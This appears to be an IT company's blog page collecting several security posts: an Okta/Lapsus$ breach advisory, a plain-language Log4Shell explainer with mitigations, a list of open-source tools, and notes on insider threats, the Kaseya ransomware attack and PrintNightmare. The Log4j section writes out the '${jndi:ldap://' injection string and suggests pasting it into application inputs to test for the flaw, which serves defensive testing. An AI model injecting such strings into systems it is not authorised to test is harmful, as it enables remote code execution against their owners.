We strive to make technology integrate seamlessly with your business so your business can grow. As your technology partner, when your business grows ours will grow with you, therefore, we will work hand in hand with you to support your growth.
Extrotion group Lapsus$ posted screenshots of what it claimed was #okta ’s internal systems. The hackers claimed not to have accessed or obtained data on #okta itself and were focused on the company's customers, which include Govt and Non govt high profile customers.
The hacking group has attacked other high-profile targets in recent weeks, including NVIDIA, Samsung and Ubisoft. NVIDIA confirmed that hackers obtained company data in February, while Lapsus$ claimed to have leaked 190GB of Samsung data
#lapsus$ also released a torrent on Monday that's said to contain 37GB of source code for around 250 projects. The group claims the data includes 90 percent of Bing's source code and 45 percent of Cortana and #Bing Maps code. Other affected projects seem to include websites, mobile apps and web-based infrastructure.
#Okta develops and maintains Identity and Access Management systems. In particular, they provide a Single Sign-On solution. A huge number of large companies employ Okta’s solutions.
While the full scope and impact of the potential attack is not yet clear, the following precautionary steps are recommended to ensure that potential damage is contained:
Revoke all active logins and make all users re-authenticate.
plan to start rotating keys and creds. rotating might force user re authinticate anyway, but the attacker could already have a computer logged into your org so
• Rotate critical credentials managed in Okta solutions, including API keys, passwords, and Multi Factor Authentication tokens. Once this is accomplished and based on ongoing publication of new information, full rotation of all Okta credentials may be advised.
• Investigate Okta Log : Perform a focused investigation into Okta logs to identify irregular access which may indicate malicious activity targeting organizational credentials and systems. This investigation should initially focus on identifying irregular access such as access from uncommon IP address ranges and User Agents or access in highly irregular times of the day or week. If possible, perform these analyses going back to the end of 2021 to cover the currently understood potential length of the breach.
• Critical Asset Access Investigation. Perform a focused investigation to identify potential malicious access to organizational resources leveraging credentials managed in Okta, according to the same logic mentioned above. If such activities are identified, a deep dive investigation should be initiated to assess the full potential scope of the breach.
Explaining #log4j for non-technical people, because the internet is burning down and y'all might want to know what's happening and why there's all this "${jndi:ldap" stuff out there.
Log4j is a popular logging library used in Java programming language. A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.
It logs a lot of information. When you browse to a website, it will write down what IP address you have, what browser you are using (firefox, chrome, edge... ), when you made the request, what page you accessed... and more!
So, this log4j library is used in A LOT of Java software, and there is approximately 3 billion devices that run Java. Quick math: that's huge.
Log4j is present in web servers, your phones, possibly on your smart fridge and plenty of other places...
A logger is supposed to just write down what happens to a hard drive, or send it to another server to store it. But in the case of log4j, there are a few things that are performed before writing anything. One of the things it does is look for patterns like ${something} and will try to replace it with another piece of information. It is used to add context, for example, ${date} would be replaced by today's date.(I have no idea if this example works, it's just to keep it simple)
So when there's a ${jndi: pattern, it will try to replace it.
Except that this pattern triggers another mechanism that loads a resource from another computer, anywhere on the internet, we just have to tell it where to get the data from. This data can be a malicious software.
Due to some internal Java mechanism, this malicious software is automatically run on the computer that used log4j. This means that at this point hackers can make the targeted computer do (almost) whatever they want. This gets really bad because we don't need to know which computer to target.
Remember when I said the web servers logs what browser you use? Well, we can just tell it that our browser is "${jndi: [...]", and if it uses log4j it will trigger the vulnerability.
In real life that would be the same as giving the keys to your house to a random stranger you just saw pass in front of you, without even realizing it. So... yeah. #log4j the above simple explanation by Emy| eq in tweeter entropyquween_
So this is big and affected a lot of companies with servers confirmed to be vulnerable to Log4Shell attacks include the likes of Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase, and possibly thousands more.
Apache has released Log4j 2.15.0 to address the maximum severity CVE- 2021-44228 RCE vulnerability. https://t.co/PzSkXJUxEi
Workaround so far: Upgrade log4j or if you cannot upgrade then you can mitigate the RCE vulnerability by setting log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in JVM command line).
Note that this workaround only works for log4j2 version 2.10...2.15. If companies have an older library version of log4j2 (note that having an older version inside .jar archive does count) this workaround is not safe to use.
Mitigation for previous releases (>=2.10): set system property "log4j2.formatMsgNoLookups" to "true" or remove the JndiLookup class from the classpath.
Issue Found on update:
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
https://www.cve.org/CVERecord?id=CVE-2021-45046
And another issue discovered: Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit asecond bugdisclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware.
The new vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0.
A. Test and detect vulnerable applications. by John Hammond
https://log4shell.huntress.com/
The explain-like-I'm-five breakdown is that you simply copy and paste the generated JNDI syntax into _anything_ (typically form fields, application input boxes, logins, anything) and check if it received a connection. NO code is ran on other than making this connection to test.
B. How to test your apps for #log4shell vulnerability
1. Generate a DNS token https://t.co/vCzVG0O03i
2. Wrap that token in
Prefix: ${jndi:ldap://
Suffix: /a}
3. Use that value in search forms, profile data, settings etc. of your apps
4. Get notified when you triggered a reaction https://t.co/1w6jmF9qgy
C. I know that using regex is dumb and shit, but it's just first-line defense. This one I is capable to detect obfuscated payloads and should produce very few false positives:
For forensic examiners, it's not known how practical exploitation is, but both Cellebrite BlackLight and Autopsy use components that leverage the vulnerable log4j class.
Elasticsearch for BlackLight (possibly inspector also), and Apache Solr for Autopsy keyword searching.
F. You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
Grep / Zgrep
This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.
Cryptocurrency miners EXECVE : This query hunts through EXECVE Syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.
Customers can run commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE- 2021-44228 can be found here https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
The term OPEN SOURCE refers to software whose source code is freely
available to download, edit, use and share, with no copyright
restrictions and that's why we love it.
You will find open source versions of almost every software imaginable - from Operating systems, office suites, media to accounting, and productivity. With that in mind, here's our pick of the very best open-source software.
Operating System: Linux
Let's start with the main thing you need first is an Operating System for your PC or Laptop. In the past 10 years, the gap between the features in all the major operating systems has become smaller and smaller. Linux operating systems aren't just for geeks and nerds. Anyone can install Linux and use it for their everyday computing needs including browsing the web, watching Netflix, typing letters,
sorting home finances, video editing, photo editing, and managing music collections. There is a lot of option to choose from for everyone from Novice to System Administrator to Hackers and Security professionals everyone loves Linux as their OS.
Ubuntu:One of the most popular distros for good reason, Ubuntu is an open-source software operating system that runs from the desktop, to the cloud, to all your internet connected things.
Ubuntu is officially released in three editions: Desktop, Server, and Core (for the internet of things devices and robots). Ubuntu is a popular operating system for cloud computing. Ubuntu is released every six months, with long-term support (LTS) releases every two years. Download form here
Linux Mint is a great ‘default’ distro for new Linux users, as it comes
with a lot of the software you’ll need when switching from Mac or
Windows, such as LibreOffice, the favored productivity suite of Linux users. It also has better support for proprietary media formats,
allowing you to play videos, DVDs, and MP3 music files out of the box. Why not give it a go today.
The next is you required your productivity tool and here comes to the rescue. LibreOffice is a powerful office suite – its clean interface and feature-rich tools help you unleash your creativity and enhance your productivity. LibreOffice is a full suite of workplacesoftware package, together withwonderful apps for text documents, spreadsheets, presentations, and databases. These are all absolutely compatible with the most recent Microsoft file formats, thus you’ll haven't anyhassle sharing files that employ with users of Word, Excel, PowerPoint, and Access.
LibreOffice includes several applications that make it the most powerful Free and Open Source office suite on the market. You can download it form clicking on their official link here .
Email is a key part of our everyday life Thunderbird is a free and open-source email, news feed, chat, and calendaring client, that’s easy to set up and customize. One of the core principles of Thunderbird is the use and promotion of open standards -
this focus is a rejection of our world of closed platforms and services that can’t communicate with each other. We want our users to have freedom and choice in how they communicate. You can download it form clicking on their official link here .
Download Mozilla Firefox, a free Web browser. Firefox is created by a global non-profit dedicated to putting individuals in control online. Firefox is available for Microsoft Windows, macOS, Linux, BSD, illumos,and Solaris operating systems. Its sibling, Firefox for Android, is also available.You can download it form clicking to their official link here even you can download in your onw language .
GnuCash is personal and small-business financial-accounting software, freely licensed under the GNU GPL and available for GNU/Linux, BSD, Solaris, Mac OS X, and Microsoft Windows. Designed to be easy to use, yet powerful and flexible, GnuCash allows you to track bank accounts, stocks, income, and expenses. As quick and intuitive to use as a checkbook register, it is based on professional accounting principles to ensure balanced books and accurate reports. Download here
When your computer is getting full, BleachBit quickly frees disk space.
When your information is only your business, BleachBit guards your privacy. With BleachBit you can free cache, delete cookies, clear
Internet history, shred temporary files, delete logs, and discard junk you didn't know was there. Designed for Linux and Windows systems, it
wipes clean thousands of applications including Firefox, Internet
Explorer, Adobe Flash, Google Chrome, Opera, Safari, and more.
Beyond simply deleting files, BleachBit includes advanced features such as shredding files to prevent recovery, wiping free disk space to hide traces of files deleted by other applications, and vacuuming Firefox to make it faster. Better than free, BleachBit is open source. Download link
Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account,
your website's FTP password, online passwords (like
website member account), etc. The list is endless. Also, you should use different passwords for
each account. Because if you use only one password everywhere and someone gets this password you have
a problem... A serious problem. The thief would have access to your e-mail account, website,
etc. Unimaginable.
KeePass is a free open source password manager, which helps you to manage your passwords in a secure way.
You can put all your passwords in one database, which is
locked with one master key or a key file. So you only have to remember one single master password or
select the key file to unlock the whole database. The databases are encrypted using the best and most secure
encryption algorithms currently known (AES and Twofish). Download link
Safeguard Your Data/ Disk Encryption:
DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition. DiskCryptor is file and drives encryption software with all the whistles and bells you will ever need. Just like in TrueCrypt,
DiskCrypror can encrypt any of your files, system drives, and other external devices like CD’s and thumb drives. Moreover, DiskCryptor can
encrypt your data with different encryption algorithms like AES
(Advanced Encryption Standard), Twofish, Serpent, and also uses a
combination of cascaded algorithms for increased security. If you are
previously using TrueCrypt for your encryption purposes, then
DiskCryptor is the closest free option available with active development and support.
VLC media player (commonly known as VLC) is a free and open-source, portable, cross-platform media player and streaming media server.VLC offers everything you could need from a media player - comprehensive format support, streaming, downloading, and much more download here
GIMP is a cross-platform image editor available for GNU/Linux,
OS X, Windows, and more operating systems. It is
free
software, you can change its
source code
and distribute
your changes. Whether you are a graphic designer, photographer, illustrator, or scientist, GIMP provides you with sophisticated tools to get your job done. You can further enhance your productivity with GIMP thanks to many customization options and 3rd party plugins.Download Link
Shotcut is a free, open-source, cross-platform video editor. Shotcut is a free, open-source, cross-platform video editor for Windows,
Mac and Linux. Major features include support for a wide range of
formats; no import required meaning native timeline editing; Blackmagic
Design support for input and preview monitoring; and resolution support to 4k. More features and download link here
Free, open-source, cross-platform audio software. Audacity is an easy-to-use, multi-track audio editor and recorder for Windows, Mac OS X, GNU/Linux Download Here
What did we miss?
Is there an open-source application that we missed? These are just a few of the best open-source/ free software I use for my personal use. They offer terrific value and since most of them are open source they are more secure for your privacy and protection in this digital age.
We think of this as a work in progress, so if
you believe there is software that should be added to this list, please
let us know in the comments section below.
An Insider can be ANYONE Employee, Contractor, Business Partner, etc. with the right motive and means, and can have a Tactics at their disposal, that will put
an organization’s assets at risk.
An organization must Think Outside The Box to successfully detect and mitigate the risks posed by Insiders.
Malicious Insiders
don’t care about compliance regulations. They just look for security gaps and vulnerabilities within an organization, to achieve their objectives. The impacts
from Insider Threat incidents can be very severe, costly and damaging.
Not all incidents by Insiders are malicious. Non-Malicious Insider incidents can be just
as damaging as malicious incidents. Given this threat landscape, it is
imperative that critical infrastructure entities prioritize and dedicate
resources to preempt and/or mitigate insider threat.
To help The National
Counterintelligence and Security Center (NCSC) issued “Insider Threat Mitigation
for U.S. Critical Infrastructure Entities: Guidelines from an Intelligence
Perspective. Read on attached document if you interested .
insider threat
Related to this is
another whitepaper by Simone (Cy) Genna publish by SANS Title:
Information Security Starts with the Employees which you can download
from here
After #printnightmare Another High Alert for Security Community and administrators. No weekend or holidays for #cybersecurity .
#Kaseya VSA Supply-Chain #Ransomware Attack by ransomware group REvil is exploiting vulnerable instances of Kaseya VSA globally.
Kaseya VSA is a platform that provides endpoint management and network monitoring. Anyone who is currently using or has a MSP that is running #Kaseya software has potentially been compromised!
Once inside the supplier’s system, attackers use it as a jumping off point to access its customers’ networks too. Then they install ransomware, which locks up victims’ data, only releasing it once a ransom payment has been made.
It is recommend organisations follow the advice provided by Kaseya, to immediately #shutdown your Kaseya server until further notice.
So far 200 US company affected and one of Sweden's biggest grocery chains, closed all of its 800 stores today after this attack as they were unable to operate its cash registers.
Technical Details:
Kaseya supply chain attack Indicators of Compromise (IOCs)
HASHES (SHA256)
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
e
More info available here:
https://lnkd.in/gJ5hfD2
S
someone rightly said Cybercriminals are awful for a whole bunch of reasons, but especially for ruining long weekends and holidays for IT professionals over and over again.
Be nice to your IT team. They're the ones working through the nights and weekends to protect you from these scum.
A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations.
An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges.
Attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
Due to the possibility for exposure, domain controllers and Active Directory admin systems need to have the #Print #spooler service disabled. Do It now and save yourself from Print spooler vulnerability CVE-2021-34527 #printnightmare
see the flowchart to determine if you required to disable print spooler now
If disabling the Print Spooler service is appropriate for your organisation you can do the following way.
1. The recommended way to do this is using a Group Policy Object via
Real life
example of Cyber risk response. This might help you to understand some key
concept in cyber world. After all, Cyber Security don't have to be boring,
right. Then read on, this might help you smile.
Threat
Actors = someone who wants to punch you in the face.
Threat =
the punch being thrown.
Severity = whether you fall down after the punch, and how long it might
take for you to stand up again.
Vulnerability = your inability to defend
against the punch
Risk = the likelihood of getting punched in the face
Acceptable Risk = your willingness to be punched in the face
Attack Surface = the size and shape of your face
Impact = broken nose, medical bills, lost time at work Single loss event = one tooth, Risk appetite = number of teeth willing to part with, Compensating control = dentures / Mate who was in the special forces' Vulnerability Assessment = checking the size and shape of your face Compliance = how you think this all works until you've been punched in the face
Risk posture = whether you know that talking shit in a pub is likely to get you
punched in the face or not. RTO = how long it takes you to regain consciousness RPO = how much you forget when you blacked out
Cyber Risk Insurance = your mates at the pub betting on if you can
"talk that kinda shit" and not get punched in the face
Penetration
testing / PEN TEST = saying "boo" very loudly to see if you'll protect
your face
Red
Team = boxing
Exploit
= the fist
0day
= kick in the groin
Side
channel = your wallet being nicked whilst you are being punched in the face.
APT
= a mate who also wants to punch you in the face
Unhackable
= Pissing off professional boxers while bragging about your knowledge of
Karate.
Bounty
Hunter = someone who promises to wear gloves when they punch you if you promise
to pay them based on where they punch you
Bug
Crowd = cage fight organizer.
Security stack / Blue Team = your mates at the
pub with you
Patch Tuesday = your weekly gym visit
Alert = friend who calls an ambulance. Investigation ➡️ triage: the EMTs who arrive. Incident response: the doctors who remediate your punched face. Digital forensic: documenting your injuries to reconstruct the type of punch in
detail. Threat Intelligence = pointing at a person that has a history of punching
people in the face.i e, “Bob’s going to come at you with a right cross”
Air gap = avoiding the pub by staying at home DEFCON presentation = all of your friends getting drunk in Las Vegas watching
video of you being punched in the face.
Enjoy your day.
credit: it all started from caseyjohnellis @cje twitter account